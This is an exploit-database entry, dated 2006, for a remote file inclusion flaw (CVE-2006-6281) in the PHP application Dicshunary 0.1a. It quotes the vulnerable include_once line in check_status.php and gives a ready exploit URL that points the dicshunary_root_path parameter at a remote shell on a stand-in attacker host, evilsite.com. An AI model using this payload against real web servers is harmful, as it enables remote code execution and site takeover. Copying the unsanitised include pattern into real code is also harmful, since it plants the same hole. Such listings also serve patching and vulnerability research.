Dicshunary 0.1a - 'check_status.php' Remote File Inclusion

Author: DeltahackingTEAM
type: webapps
platform: php
port: 
date_added: 2006-11-16 
date_updated: 2016-09-16 
verified: 1 
codes: CVE-2006-6281 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdicshunary_0.1alpha.tar.gz

**********************************************************************************************************
                                              WwW.Deltahacking.NeT (Priv8  Site)
                                              WwW.Deltahacking.Ir    (Public Site)
**********************************************************************************************************

* Portal Name :dicshunary 0.1 alpha

* Class = Remote File Inclusion ;

* Download =http://puzzle.dl.sourceforge.net/sourceforge/dicshunary/dicshunary_0.1alpha.tar.gz

* Found by = DeltahackingTEAM

* User In Delta Team (TAnha & Dr.Pantagon )

--------------------------------------------------------------------------------------------

--------------
- Vulnerable Code

include_once($dicshunary_root_path.'common.inc');

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/check_status.php?dicshunary_root_path=http://evilsite.com/shell?


--------------------------------------------------------------------------------------------

--------------

SP TNX : Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc,

**********************************************************************************************************

# milw0rm.com [2006-11-17]